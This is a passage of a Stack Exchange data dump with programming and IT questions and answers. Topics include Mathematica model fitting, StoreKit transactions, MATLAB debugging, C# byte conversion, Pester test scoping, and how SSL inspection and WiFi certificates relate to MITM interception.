{0,aR,aRH1,aRH2,aRH3}.X[t]\n<\/code>\nImplementation of the model and fitting:\nThe model is formulated below using NDSolve or ParametricNDSolve.\n<code>Clear[F, Xsol, G, Ysol];\nX[t_] := {h[t], r[t], rh1[t], rh2[t], rh3[t]};\nm[t_] := {{-k1*r[t], 0, ki1, 0, 0}, {0, -k1*h[t], ki1, 0, 0}, {0, k1*h[t], -(ki1 + k2), ki2, 0}, {0, 0, k2, -(ki2 + k3), ki3}, {0, 0, 0, k3, -ki3}};\n (* Fixed parameters for this example *)\naR = 0; k2 = 0.347; ki2 = 0.0235; k3 = 0.0507; ki3 = 0.00645; ht = 800; rt = 20;\n(* Solving of ODEs *)\nXsol = ParametricNDSolve[{X'[t] == m[t].X[t], X[0] == {ht, rt, 0, 0, 0}}, X[t], {t, 0, 500, 0.01}, {{k1, 0.0001, 0.1}, {ki1, 0.1, 100}, {k2, 0.0001, 10}, {ki2, 0.00001, 10}, {k3, 0.00001, 10}, {ki3, 0.00001, 10}, {ht, 1, 10000}, {rt, 1, 1000}}]\nYsol := NDSolve[{X'[t] == m[t].X[t], X[0] == {ht, rt, 0, 0, 0}}, X[t], {t, 0, 500, 0.01}]\n\n(* Quantity to be fitted *)\nF[k1_?NumberQ, ki1_?NumberQ, k2_?NumberQ, ki2_?NumberQ, k3_?NumberQ, ki3_?NumberQ, aR_?NumberQ, aRH1_?NumberQ, aRH2_?NumberQ, aRH3_?NumberQ, t_?NumberQ, rt_?NumberQ] := (F[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, ht, rt] = \nFunction[{tu}, {0, aR, aRH1, aRH2, aRH3}.Through[(X[t] \/. Xsol)[k1, ki1, k2, ki2, k3, ki3, ht, rt]] \/. t :> tu])\n\nG[k1_?NumberQ, ki1_?NumberQ, k2_?NumberQ, ki2_?NumberQ, k3_?NumberQ, ki3_?NumberQ, aR_?NumberQ, aRH1_?NumberQ, aRH2_?NumberQ, aRH3_?NumberQ, ht_?NumberQ, rt_?NumberQ] := (G[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, ht, rt] = \nFunction[{tu}, Evaluate[{0, aR, aRH1, aRH2, aRH3}.Flatten[X[t] \/. Ysol]] \/. t :> tu])\n<\/code>\nThe data for the example was:\n<code>data = Table[{t, 0.22 (1 - E^(-7.25 t)) + 0.10 (1 - E^(-0.084 t)) + 0.15 (1 - E^-0.027)}, {t, 0, 500}]\n<\/code>\nThe fitting was run as follows:\n<code> Clear[FitF, FitG]\n Timing[FitF = NonlinearModelFit[data500, F[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, ht, rt][t], {{k1, 0.001}, {ki1, 7}, , {aRH1, .032}, {aRH2, .01}, {aRH3, .012}}, t]]\n Timing[FitG = NonlinearModelFit[data500, G[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, ht, rt][t], {{k1, 0.001}, {ki1, 7}, , {aRH1, .032}, {aRH2, .01}, {aRH3, .012}}, t]]\n<\/code>\nThe output gave the same set of parameter values (along with some NDSolve's warnings):\n<code> {k1 -> 0.000991454, ki1 -> 7.00047, Null -> 1., aRH1 -> 0.117238, aRH2 -> 0.0278981, aRH3 -> 0.0189699}\n<\/code>\nBut very different timings: ~ 23 s for the 'ParametricNDSolve'-model (F), and ~ 1128 s for the 'NDSolve'-model. That is, a 50 fold difference. (I must mention that such difference in timing was also observed in other formulations I tried in which no warnings or errors were prompted)\nUsing the ParametricNDSolve strategy, the simultaneous fitting of 9 parameters of the model to 9 curves of about 14000 points each, converged very well and it took about 3600 s (1 hour). That's really fine. Now we are talking.\nMaybe the convenience of using ParametricNDSolve is obvious for many -it is not for a beginner as me-, but I think it deserves some discussion, at least for future reference for a new beginner.\n","meta":{"source":"mathematica.stackexchange","title":"How to speed up NonlinearModelFit applied on a NDSolve solution?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How long will store kit keep unfinished transactions?\n\nQuestion: I'm working on this app with in app purchase enabled.\nThe happy path is all covered, everything is fine, I'm trying to work out the non happy path.\nTo put it simply, the purchase is bound to a server side component.\nOn purchase, when the transaction is in the \"Purchased\" state, I'm supposed to go out to the server, which will enable the user's account.\nWhen the request comes back, I then clean up some stuff and eventually call -finishTransaction: on the SKPaymentQueue.\nThe non happy path is pretty much when the server call fails for whatever reason. Network not available, network timeout, the user closed the app right after purchasing it and just before I could make the server call, you name it.\nMy tests in the 5.1 simulator with a sandbox account show me that an unfinished Purchased transaction will come back in the queue on next start up, and my delegate will be properly called with it.\nBut, after a little while, say 5 minutes for instance, boom, gone is the transaction.\nConsidering the whole stability of sandbox accounts, I'm willing to call that on the simulator's implementation, but it's hard to tell.\nWhat's the appropriate way of dealing with this problem?\nBonus question: when does apple actually charge somebody? Sounds like it should be AFTER the app called -finishTransaction:, but I couldn't find any evidence of this anywhere.\nThanks,\n\/kra\nUPDATE:\ntesting on physical device, almost an hour and the transaction is still there. Looks like the transactions disappearing is a simulator thing.\nAnswer: When I implemented In-App purchases I gave up on testing it in the simulator. The behavior is just too different. Test it on the device and see whether it works there. \nI'm also interested in your question about the charging, since I'm not entirely sure about it either (my app isn't released yet ;) ). \nComment: Thanks for your answer. That's pretty much the conclusion I'm getting to, sandbox is completely unreliable, and you have to take a leap of faith before going to prod. Some earlier tests on device tipped me that they would always come back (and a bit of common sense indicates that too). Testing on devices isn't exactly reliable either, I've had my share of uninstall, reboot, reinstall thanks to store kit freaking out with the dreaded \"Can't reach the appstore\" error.\nComment: I have to say that I didn't really get into too much trouble when testing on the device. I followed this guide very closely: http:\/\/troybrant.net\/blog\/2010\/01\/in-app-purchases-a-full-walkthrough\/. The only thing that bugs me sometimes, is that it returns invalid product id's after doing some recompiles - when that happens I just have to delete and build\/run again though. The whole code-sign relation to product id's is also still magic for me - for example I don't get why it works when doing an adhoc-testrollout with the debug signing.\nComment: Yeah, that part is pretty much ok, my problem was more with switching between sandbox accounts. At some point, StoreKit just gives up, constantly returns a phony error no matter what you do, and you pretty much have to uninstall\/reboot the phone\/reinstall. I don't recall any issue with the code signing, you just have to be careful to use a specific provisioning profile, not a wildcard one. As long as the items are available, it should work regardless of the cert.\nComment: Yeah see, here is the thing: For the ad-hoc test provisioning on the other hand I do need the wildcard one. For some reason it seems that two provisioning profiles are active since both aspects work: I can give testers the app and they can test the In-App store. It makes sense but I'm confused why it works.\n","meta":{"source":"stackoverflow","title":"How long will store kit keep unfinished transactions?","dup_signals":{}},"subset":"stackexchange"} +{"text":"conditional dbstop to locate where variable becomes negative\n\nQuestion: I realise that this has been brought up before; but I am hoping that someone can clarify something for me.\nOne of my variables is being calculated as a negative number at some point during my model run..however, this is a mistake (they can only be positive numbers). So I need to locate where this is happening a trace where the source of error is being produced.\nThe model is too large to do this manually, so I was hoping to use dbstop in some guise. I realise from reading the posts here that it is not simply a case of giving a condition (dbstop in test.m if var<0); so I was hoping to use a conditional if statement to display an error (disp 'error'), which I could use in: dbstop in test.m if error.\nHowever; what I am getting back is:\n'Breakpoint expression 'error' resulted in an error. The error was Error using==>error\nToo many output arguments.'\nCan anyone suggest a way for me to isolate when my variable is becoming negative?\nComment: Can you post the actual code you are using to display the error, including the conditional if statement? It sounds to me like you are doing the right thing, but you may have a bug in that section of code.\nComment: This is the sample code I was messing with to see if I could get it to stop:for i=(1:10);\n dbstop in 'db_test.m' if error;\n a=[20:30];\n b=[20:2:40];\n c(i)=a(i)-b(i);\n if c(i)<0;\n disp error;\nend\nend So, I was hoping it would put in a stop point when i=2...but it doesn't...even though it is displaying the 'error'. Am I doing something stupid?\nComment: @matlab_newby but there is no error when `i=2`. try `assert(c(i)>=0)` just after your `if..end`\nComment: I think the issue is that you are calling `dbstop in 'db_test.m' if error` within your loop within `db_test.m` itself. Instead, run `dbstop in 'db_test.m' if error` from the command window and then run the file \u2013 you might need to run `dbclear db_test.m` first.\nAnswer: You could try <code>dbstop if error<\/code> and then in your code <code>assert(var>=0)<\/code> at the point where you think it might be becoming negative (i.e. throw an error if it is not)\nComment: I've never used the 'assert' command before..it could be useful..but I have no idea where the variable is becoming negative. It is nested within a nested loop. I'll look into that command though a bit more. Thanks\nComment: How often does it change values (in how many lines of code) within those loops? Or else just place it at the end of a loop and then you can check the loop state and set a normal conditional break point\nComment: it changes value daily for 140 years of daily input. I can't place it at the end of the loop either due to the fact that other variables are dependant on its value (which needs to be calculated first). If I could place it at the end though; what do you mean by 'set a normal conditional breakpoint'?'dbstop if error'?\nComment: You can place it at the end. I mean when you enter debug mode, check the values of the looping variables and then set a [conditional breakpoint](http:\/\/www.mathworks.com\/help\/matlab\/matlab_prog\/debugging-process-and-features.html#brqxeeu-234) to stop at the beginning of the loop at those values so you can just step through that one loop iteration where your variable goes negative and see exactly where it happens.\nComment: But when I said how often does it change, I mean how often in terms of lines of code. How many times do you assign or alter it's value? Just put the assert directly after those lines. I doubt it will be many.\nComment: that worked. That's great.As you said, I put in the assert(var(i)>=0) after the variable had been calculated. Many thanks\n","meta":{"source":"stackoverflow","title":"conditional dbstop to locate where variable becomes negative","dup_signals":{}},"subset":"stackexchange"} +{"text":"Use of server and root certificate in ssl termination and inspection\n\nQuestion: I'm researching vendors which allow SSL termination and inspection, I came across Cisco CWSA technology, the technology was somewhat easy to understand the stuff which really boggled my mind was the difference between <code>root<\/code> and <code>server<\/code> certificate. \nThis article mentions: \n\nA Server certificate cannot be used in order to sign other\n certificates; therefore, HTTPS decryption does not work if a Server\n certificate is installed on the WSA.\n\nI'm mean if that certificate is signed by root CA, then why it can't go there on appliance for decryption? I'm missing something here. Help guys\nAnswer: There's a difference between the capabilities of a \"root\" certificate, which can be used to sign other certificates and a \"server\" certificate which cannot.\nFor an SSL proxy if you use a server certificate then the only host whose traffic could be seemlessly intercepted is the one whose Common Name is included on the server cert.\nThe general idea with this kind of SSL intercepting proxy is that you'll have a CA certificate which will be trusted by the clients connecting through the proxy and which can be used to create server certificates that the clients will trust, on-the-fly.\nComment: well you can but it wouldn't be a lot of use as it'd only decrypt traffic for one server :) I don't know for sure why cisco would block this, but my guess would be that if the product is intended for use as a general SSL proxy, it will only serve that function effectively with a root cert deployed to it, so they're writing their documentation from that perspective..\nComment: Thanks @Rory for reply. So, tech speaking you can you use server certificate to decrypt.Why CISCO has then made it sound impossible?\nComment: You have a point but what about inbound ssl decryption instead of outbound where gmail, facebook, skype more of application control and policing required. In my case its just one server which needs to be inspected for layer 7 attacks?\nComment: well as I say, don't know the product, my guess was it would be intended for outbound rather than inbound, so that may be their reasoning. In my experience in-bound to a web app. for examples tends to be done by a different class of product (e.g. WAF), although it is similar work being done...\n","meta":{"source":"security.stackexchange","title":"Use of server and root certificate in ssl termination and inspection","dup_signals":{}},"subset":"stackexchange"} +{"text":"Convert any type of array to byte[] of variable length in c#\n\nQuestion: I am trying to write a generic method which converts any type of array to byte array. \n<code>method definition:\n\n public byte[] convert_item_to_bytes(dynamic items)\n {\n byte[] bytearr = ??\n \/\/I tried blockcopy, but i am not getting the correct number of elements\n \/\/Buffer.BlockCopy(items, 0, bytearr, 0, items.Length );\n\n return bytearr;\n }\n\nexamples of my method calls:\n\n convert_item_to_bytes(new int16[]{0x1234, 0x4567, 0x9574});\n convert_item_to_bytes(new int32[]{0x3545, 0x3352, 0x9642, 0x5421});\n convert_item_to_bytes(new uint64[]{0x4254, 0x8468});\n \/\/etc.... my method calls can also be of float type.\n<\/code>\nI am using dynamic in the definition because i get to know the type online at runtime. \nPS: I saw an another example which uses BinaryFormatter and MemoryStream. I do not want to use that. (How to convert byte array to any type)\nIs there any other possible way to solve this?\nComment: You can answer this if you know **how** you can \"convert\" any arbitrary object to a byte array. The premise as-is is quite nonsensical, as you _will_ have to resort to binary serialization, which is exactly what the BinaryFormatter is for. If \"any type of array\" actually means \"any numeric type of array\" it [becomes a bit easier](https:\/\/msdn.microsoft.com\/en-us\/library\/system.bitconverter.getbytes(v=vs.110).aspx).\nComment: I'd look into the [BinaryWriter](https:\/\/msdn.microsoft.com\/en-us\/library\/system.io.binarywriter(v=vs.110).aspx?f=255&MSPPError=-2147217396)\/[BinaryReader](https:\/\/msdn.microsoft.com\/en-us\/library\/system.io.binaryreader(v=vs.110).aspx) classes.\nAnswer: There's quite some issues with what you're actually asking, especially if you don't want to write code per type. Luckily there aren't that many numeric type in the BCL, so you could write it all out once or even let it be generated.\nA very naive approach is shown below:\n<code>public static void Main()\n{\n int[] intArray = new int[] { 1, 2, 42, };\n\n byte[] intOutput = ConvertToByteArray(intArray, sizeof(int));\n\n for (int i = 0; i < intOutput.Length; i++)\n {\n Console.Write(\"{0:x2} \", intOutput[i]);\n if ((i + 1) % singleItemSize == 0)\n {\n Console.WriteLine();\n }\n }\n}\n\nprivate static byte[] ConvertToByteArray<T>(T[] input, int singleItemSize)\n where T : struct, \n IComparable, \n IComparable<T>, \n IConvertible, \n IEquatable<T>, \n IFormattable\n{\n var outputArray = new byte[input.Length * singleItemSize];\n\n \/\/ Iterate over the input array, get the bytes for each value and append them to the output array.\n for (int i = 0; i < input.Length; i++)\n {\n var thisItemBytes = GetBytes(input[i]);\n Buffer.BlockCopy(thisItemBytes, 0, outputArray, i * singleItemSize, singleItemSize);\n }\n\n return outputArray;\n}\n\nprivate static byte[] GetBytes<T>(T input)\n where T : struct, \n IComparable, \n IComparable<T>, \n IConvertible, \n IEquatable<T>, \n IFormattable\n{\n if (typeof(T) == typeof(int))\n {\n return BitConverter.GetBytes(Convert.ToInt32(input));\n }\n else if (typeof(T) == typeof(float))\n {\n return BitConverter.GetBytes(Convert.ToSingle(input));\n }\n else\n {\n throw new ArgumentException(\"T\");\n }\n}\n<\/code>\nThis outputs the following (depending on your system's endianness):\n<code>01 00 00 00 \n02 00 00 00 \n2a 00 00 00 \n<\/code>\nAnd so the <code>ConvertToByteArray()<\/code> method delivers a useless array of 12 bytes given the input of <code>int[] { 1, 2, 42 }<\/code>. It is useless because you don't know whether that array contains 12 bytes, 6 chars, 3 ints, 3 floats or 3 unsigned integers. \nApart from that, there's a lot of (performance) problems with the shown code, which I'm sure can be simplified. \nInstead perhaps you can find another solution for this seemingly XY problem.\nComment: I'll check (it's been a while) to see what version I may have had problems with the `struct` constraint.\nComment: Which version of C#\/.Net are you using? Only reason I ask is because of the `struct` constraint on `ConvertToByteArray` method. I thought that would not compile in earlier than C# 6.\nComment: @IAbstract compiled using IdeOne, C# 5 and .NET 4.5 AFAIK.\nComment: @IAbstract alright. As far as I know it has always worked, but feel free to enlighten me!\nComment: @CodeCaster I will try your code. I am using .NET 4.5 The reason I want to convert to byte array is to transfer it to another tool. So is it simpler and faster to use BinaryFormatter and MemoryStream?\nComment: I have many paramters to convert. So, I want to put everything into a byte array and then transfer it.\n","meta":{"source":"stackoverflow","title":"Convert any type of array to byte[] of variable length in c#","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why Eclipse Export -> Executable Jar does not provide choice of classes to include?\n\nQuestion: If you use Eclipse then you can Export a project to jar with right-button click -> Export and then you have a choice of <code>Jar\/Executable Jar<\/code>.\nWell I need to create Executable Jar but then I have no flexible choice of files to include in the JAR as I do have with just Jar option. Why is that?\nJava Eclipse: Difference between exporting as a JAR and exporting as a Runnable JAR\nAnswer: Export as 'Executable Jar' will take a launch configuration and pack everything that is needed for the launch into a Jar, so selecting the files to include is not necessary there. It is a convenience functionality from Eclipse to quickly create ready-to-go executable jars with only a click.\nExport as 'Jar' will give you the choice of selecting the resources that you want to have in the Jar. It will also allow you to specify a main class and will then create an executable Jar by creating the necessary manifest file. (Just follow the 'export jar' wizard to the last page, at the bottom you will find an input box for selecting the main class. Selecting one will create an executable jar)\nRemember: An executable Jar is just a normal Jar with a MANIFEST.MF file that specifies the main class to call when executed.\n","meta":{"source":"stackoverflow","title":"Why Eclipse Export -> Executable Jar does not provide choice of classes to include?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Where to put api wrapper class in an extension\n\nQuestion: I just wrote an extension with short-name \"genderselfidentify\" (it's cool, you should check it out), which implements hook_civicrm_apiWrappers. This hook requires you to declare a class for your api wrapper functions, but the docs for it don't say exactly what you should name the class or where you should put it. The example given is:\n<code>function example_civicrm_apiWrappers(&$wrappers, $apiRequest) {\n $wrappers[] = new api_v3_APIWrapperExample();\n}\n<\/code>\nWhich implies that\n\nThe class name should start with <code>api_v3_<\/code>\nIt should be placed in the extension's <code>api\/v3<\/code> directory\n(noting the lack of <code>require_once<\/code> in the example) it will be autoloaded by CiviCRM.\n\nI found all the above to be true, naming my class <code>api_v3_GenderselfidentifyAPIWrapper<\/code> the autoloading and wrapper functionality worked great... but then I noticed something strange in the API Explorer:\n\nWhy is my wrapper class showing up as if it were an entity?\nAnswer: The example in the wiki was problematic. If you look at the wrappers included with core, they're never placed under the <code>api\/v3<\/code> folder -- they're always under <code>CRM\/Utils\/API<\/code>. (I've updated the wiki to use a different name.)\nThat's merely a matter of convention, though. The API-wrapper system doesn't impose any constraints on where to put the class or how to name it. As far as that system is concerned, you can use any valid PHP class (as long as it implements the <code>API_Wrapper<\/code> interface).\nThe limitation here is in the reflection mechanism (<code>MagicFunctionProvider->getEntityNames()<\/code> and <code>getActionNames()<\/code>) which maps between API entities\/actions and files\/folders\/functions. This is tricky to do because the naming conventions have been traditionally loose\/ambiguous, so the current implementation uses a general rule of thumb: if you put any PHP file under \"api\/v3\", then it will be reported as an entity name.\n","meta":{"source":"civicrm.stackexchange","title":"Where to put api wrapper class in an extension","dup_signals":{}},"subset":"stackexchange"} +{"text":"Generating an array using list values at indices corresponding to entries in a separate list satisfying some criterion\n\nQuestion: Imagine one has an array of integer value sets that looks like this:\n<code>testValues = {{9, 8, 8, 10, 1}, {10, 0, 0, 1, 0}, {8, 0, 0, 5, 7}, {1, 5, 7, 2, 7}, {6, 9, 3, 9, 10}, {7, 10, 7, 5, 3}, {3, 10, 6, 1, 9}, {5, 8, 7, 9, 2}, {2, 3, 2, 7, 0}, {3, 7, 10, 2, 7}};\n<\/code>\nAnd a set of lists that looks like this:\n<code>listA = {1,2,3,4,5,6,7,8,9,10};\nlistB = {1,2,3,4,5};\nlistR = {{67,56,55,33,24,32,54,667,99,103498},{5}};\nlistQ = {{653,29,49,69,19},{20987}}\n<\/code>\nHere, <code>Length[listA] == Length[listR[[1]]]<\/code>, <code>Length[listB] == Length[listQ[[1]]]<\/code>, and the number of entries in <code>testValues<\/code> is <code>Length[listA]*Length[listB]<\/code>.\nI want to very quickly output an array with entries:\n<code>{{listR[[a, 1]], listQ[[b, 1]]},...}\n<\/code>\nFor all <code>{a,b}<\/code> pairs where <code>testValues[[a,b]] >= threshold<\/code> for some integer <code>threshold<\/code> value. The entries in the array do not need to be in any particular order.\nThe naive way of proceeding could look like:\n<code>outputList ={};\n\nFor[a = 1, a <= Length[listA], a++,\n For[b = 1, b <= Length[listB], b++,\n\n If[testValues[[a, b]] >= threshold,\n outputList = Append[outputList, {listR[[a, 1]], listQ[[b, 1]]}];\n ];\n\n ];\n ];\n<\/code>\nHowever, this is quite slow. Is there a much faster method using <code>Select<\/code> perhaps? \nThe relevant list sizes are in reality something like <code>Length[listA]<\/code> $\\approx 10^2$, <code>Length[listB]<\/code> $\\approx 10^4$, and <code>testValues<\/code> has <code>Length[listA]*Length[listB]<\/code> entries.\n\nUpdate:\nI was able to use Position to do the following:\n<code>goodIndices = Position[int, x_ \/; x >= 3];\noutputList[[i]] = {listR[[#[[1]], 1]], listQ[[#[[2]], 1]]} & \/@ goodIndices;\n<\/code>\nThis is about 4x faster than the naive approach I posted earlier. Are further speedups possible?\nComment: I don't see the definition of listA, listB and listR, listQ.\nComment: In any case, you could play with DeleteCases function with `levelspec` 2\nComment: @VahagnPoghosyan I've added explicit examples for all of the lists.\nAnswer: Here is a straightforward functional transformation of your <code>For<\/code> loop which should be faster:\n<code>pairs = Select[Tuples[{listA, listB}], Extract[testValues, #] >= threshold &];\noutputList = Table[{listR[[First[p], 1]], listQ[[Last[p], 1]]}, {p, pairs}];\n<\/code>\nComment: Hmm, this doesn't seem to perform similarly? I'm getting position specification errors for different examples?\nComment: For your example the code produces the exact same output as your for loop.\n","meta":{"source":"mathematica.stackexchange","title":"Generating an array using list values at indices corresponding to entries in a separate list satisfying some criterion","dup_signals":{}},"subset":"stackexchange"} +{"text":"Ionic - build iOS package file for testing on device\n\nQuestion: Currently I am trying to build a new app with Ionic 3. I am looking for steps to build a file for installation, which has the same functionality with APK file for android devices. I don't know whether it should be an IPA file or other file types, as I have never used an iPhone or iPad myself before. Right now, I have a free developer account registered with Apple ID.\nWhat I can find on the web seems only allow developers to build apps for testing on real devices which the developers have access to. To be more specific, I always see people say that users should plug in the device via USB and pick the target device in XCode under the \"Scheme\" drop down selector. I tried to follow the steps provided by others, but it always ended up with an error in XCode, either it is related to code signing error, or device not registered in my developer account.\nWhat if I do not own any iOS devices? What I have is only a single MacBook for coding. I would like to prepare a file and send it to my friends, and let them install my app with that file on their iOS devices.\nI am using XCode 9 and Ionic 3.\nAnswer: In iOS you can no do what that, If you want to send your app to your friends for testing you have to build the app with <code>ionic cordova build ios<\/code> and then open the project in Xcode and build\/upload your project to your Apple developer account.\nAfter that, you have to use Test Flight to share your app for testing.\n","meta":{"source":"stackoverflow","title":"Ionic - build iOS package file for testing on device","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to distinguish between Wifi certificate and certificate usable for MITM?\n\nQuestion: I know that similar questions has been asked several times, but this question focuses on one aspect I did not found answered yet.\nRecently when I was connecting my iPhone to my school wifi (eduroam), it asked me to trust a wifi certificate. How do I differentiate between those that are able to MITM me and those that aren't? Are there any parameters\/description on the details of the certificate that makes them distinct?\nThe certificate I was presented with was:\n<code>\n>Issuer Name\n>Organization: QuoVadis Limited\n>Common Name: QuoVadis Global SSL ICA G3\n\n>Basic Constraints\n>Critical: No\n>Certificate Authority: No\n\n>Certificate Authority Info Access\n>Critical: No\n>Access Method: CA Issuers\n>URI:http:\/\/trust.quovadisglobal.com\/qvsslg3.crt\n>Access Method: Online Certificate Status Protocol\n>URI: http:\/\/ocdp.quovadisglobal.com\n\n>Extended Key Usage\n>Critical: No\n>Purpose: Client Authentication\n>Purpose: Server Authentication\n\n>Key Usage\n>Critical: No\n>Usage: Digital Signature, Key Encipherment \n\n<\/code>\nComment: *\"I know this question has been asked several times, but I want to make sure that it is OK.\"* - Why do you think that asking again will lead to different answers? Since you are aware of the other questions please only ask the parts which are not already answered in the other questions. In short: properly installed this certificate is usable for authentication against the WiFi network only. It will not allow to actively MITM TLS traffic. Of course, connecting to any network will allow the network operators to passively monitor traffic, but not to actively MITM TLS.\nComment: @SteffenUllrich , What i m asking is how do I differentiate which certificate will allow the operators to MITM me and which will only allow for authentication purposes only.\nComment: Then please show your current understanding based on existing answers and reduce your question to exactly this point you feel not answered yet. But in short: The difference is not in the certificate but how you install it: if you install it for authentication of the WiFi only then it can only be used for this. If you install it as a generic root CA trusted for everything then it will be usable for active TLS MITM too.\nComment: @SteffenUllrich Thank you for the advice, I have edited the question. Yes, how should I differentiate between two certificate when installing them? How do I know one is for authentication purposes only and one is installing myself a root CA? Thanks\nComment: I've changed your question and title to be more focused on what I understand you want to know. Hope this fits your problem.\nComment: @SteffenUllrich Thank you. When you mean passively monitor my traffic, if I browse on https, does that mean my school can see what I am browsing (domain), but not the content of what I am browsing (sensitive info, chat msg,etc)? Sorry if the terms used are not precise.\nComment: You school can not see the exact content on HTTPS, but can make some assumptions about it. See [Are URLs viewed during HTTPS transactions to one or more websites from a single IP distinguishable?](\/a\/4418\/37315) or [My ISP uses deep packet inspection; what can they observe?](\/a\/155060\/37315).\nAnswer: \nHow do I differentiate between those that are able to MITM me and those that aren't? Are there any signs\/description on the usage of the certificate that makes them distinct?\n\nCA certificates usable for MITM and usable as trust anchor in WiFi authentication are not really different. The difference is how these certificates are installed in the device: If they are specifically installed for authentication against a WiFi network only, then they will be only used for this purpose. If they are instead installed as a general purpose CA then they will also be used as a trust anchor in web traffic and other TLS connections and thus can be used for actively MITM TLS traffic.\nBut note that in your specific case you are not dealing with a CA certificate at all. You are only asked to install the leaf certificate specific for your current network. This can be seen from:\n\nCertificate Authority: No\n\nA CA certificate would have a \"Yes\" here and only a CA certificate is able to issue other certificates as needed in active TLS MITM attacks.\nComment: Is there any way for me to identify whether a particular certificate is for authentication purpose or general purpose CA? Or is there a way for me to differentiate the type of installation?\nComment: @mxmx: See updated answer about your specific certificate. In general: have a look at the certificate management on your device. For example current Android versions clearly distinguish between CA certificates, VPN certificates and WiFi certificates.\nComment: @mxmx In iOS CA certificates have to be explicitly to be activated as trusted root CA certificate https:\/\/support.apple.com\/en-in\/HT204477\nComment: @Robert meaning even if I installed CA certificates, but do not explicitly activate them in the settings, it won't have any effect?\nComment: @mxmx I am not sure what effects an CA certificate has that is just installed, but unless you explicitly trust it it does not have any effect on SSL\/TLS connections by apps or the system itself.\n","meta":{"source":"security.stackexchange","title":"How to distinguish between Wifi certificate and certificate usable for MITM?","dup_signals":{}},"subset":"stackexchange"} +{"text":"PowerShell: Pester Unit Test with Before\/After Blocks\n\nQuestion: I'm learning to do Unit Tests with Pester and I am having a strange problem with the Before\/After blocks. My Unit Test code is below:\n<code> Describe \"Before\/After Blocks\" {\n\n Context \"BeforeEach\/AfterAll\" {\n\n BeforeAll {\n $value = 0\n Write-Host \"->Initial value is $value\"\n }\n\n BeforeEach {\n $value++\n }\n\n It \"value is 1\" {\n $value | Should -Be 1\n }\n\n It \"value is 2\" {\n $value | Should -Be 2\n }\n\n It \"value is 3\" {\n $value | Should -Be 3\n }\n\n AfterAll {\n Write-Host \"->Final value is $value\"\n }\n }\n }\n<\/code>\nWell, as you can see in the code, my purpose is to initializate a variable and see how it gets incremented by the BeforeEach block. This is the output:\n\nContext BeforeEach\/AfterAll\n->Initial value is 0\n<code>[+] value is 1 \n\n[+] value is 2 \n\n[+] value is 3 \n<\/code>\n->Final value is 0\n\nThe variable is initialized to 0 and before any It Block it's incrementing cause the assertions didn't fail. But the AfterAll block says the variable value is 0, the initial value and not 3 as I expect.\nWhy?\nThanks.\nAnswer: The problem seems to be to be that the <code>AfterAll<\/code> block has its own scope (which I agree is a bit odd). You can get the result you expect by using global variables, although this isn't particularly great practice:\n<code>Describe \"Before\/After Blocks\" {\n\n Context \"BeforeEach\/AfterAll\" {\n\n BeforeAll {\n $global:value = 0\n Write-Host \"->Initial value is $value\"\n }\n\n BeforeEach {\n $global:value++\n }\n\n It \"value is 1\" {\n $global:value | Should -Be 1\n }\n\n It \"value is 2\" {\n $global:value | Should -Be 2\n }\n\n It \"value is 3\" {\n $global:value | Should -Be 3\n }\n\n AfterAll {\n Write-Host \"->Final value is $global:value\"\n }\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"PowerShell: Pester Unit Test with Before\/After Blocks","dup_signals":{}},"subset":"stackexchange"} +{"text":"Compile-time usage introspection\n\nQuestion: I have been trying to come up with a solution to this problem for a while and so far, everyone told me it was impossible around me so I though I'd give SO a try. \nHere is the problem : people using environment variables and not properly either testing for the result or silently using hard-coded alternative. \nWhat I wanted to do was come up with a small library that people would use instead of getenv that could, at initialization time, inform the user of the env. variables the program might be using. This would only imply doing a replace of getenv for this call and placing a single function call at the initialization of the executable or library (I would not deal with dynamic env. variable name making such as using a string constructed).\nHere is a quick example I was able to make (http:\/\/ideone.com\/Wi1JBq)\n<code>#include <iostream>\n#include <vector>\n\nusing namespace std;\n\nstatic vector<string> test;\n\ntemplate <char const *str>\nstruct EnvVar\n{\n EnvVar()\n {\n test.push_back(string(str));\n }\n const char* GetEnvVarName() const\n {\n return str;\n }\n};\n\nstatic void checkVars()\n{\n for(unsigned int i = 0; i < test.size(); i++)\n cout << \"Predefined : \" << test[i] << endl;\n}\n\n#define GENERATE_ENV_VAR(Name) char _##Name[] = #Name; static EnvVar<_ ## Name> Name;\n\n\/\/ ----- What is actually in the user file -----\n\nGENERATE_ENV_VAR(FirstEnvVar)\nGENERATE_ENV_VAR(SecondEnvVar)\nGENERATE_ENV_VAR(ThirdEnvVar)\n\nint main()\n{\n checkVars();\n cout << \"Usage : \" << FirstEnvVar.GetEnvVarName() << endl;\n cout << \"Usage : \" << SecondEnvVar.GetEnvVarName() << endl;\n cout << \"Usage : \" << ThirdEnvVar.GetEnvVarName() << endl;\n return 0;\n}\n<\/code>\nThis outputs \n<code>Predefined : FirstEnvVar\nPredefined : SecondEnvVar\nPredefined : ThirdEnvVar\nUsage : FirstEnvVar\nUsage : SecondEnvVar\nUsage : ThirdEnvVar\n<\/code>\nIt's quite obvious why it does so, the macro being used at the global level, this is initialized before the main is entered, that is why the first function calls know about them. What I want to do is not have those, so basically, have this :\n<code>int main()\n{\n checkVars();\n cout << \"Usage : \" << FirstEnvVar.GetEnvVarName() << endl;\n cout << \"Usage : \" << SecondEnvVar.GetEnvVarName() << endl;\n cout << \"Usage : \" << ThirdEnvVar.GetEnvVarName() << endl;\n return 0;\n}\n<\/code>\nand get the same output. I'm sure it would involve a lot of template\/macro hacking but it would be great. I would prefer not just having a script that parses the code and generate code but I know this could be a solution. I want pure C++ if possible, boost can be fine.\nThank you.\nAnswer: Why does it need to be a template class? You should just be able to pass <code>#NAME<\/code> into a constructor that accepts <code>const char *<\/code>. The run time will call constructors for all file-scope variable instances before reaching your code in <code>main<\/code>.\n<code>class EnvVar\n{ \n private:\n const char *const str;\n\n public:\n static vector<string> env_vars;\n\n EnvVar(const char *str_) : str(str_)\n {\n env_vars.push_back(string(str_)); \/\/ this vector seems redundant...\n }\n const char* GetEnvVarName() const\n {\n return str;\n }\n};\n\n#define GENERATE_ENV_VAR(Name) EnvVar Name##_( #Name 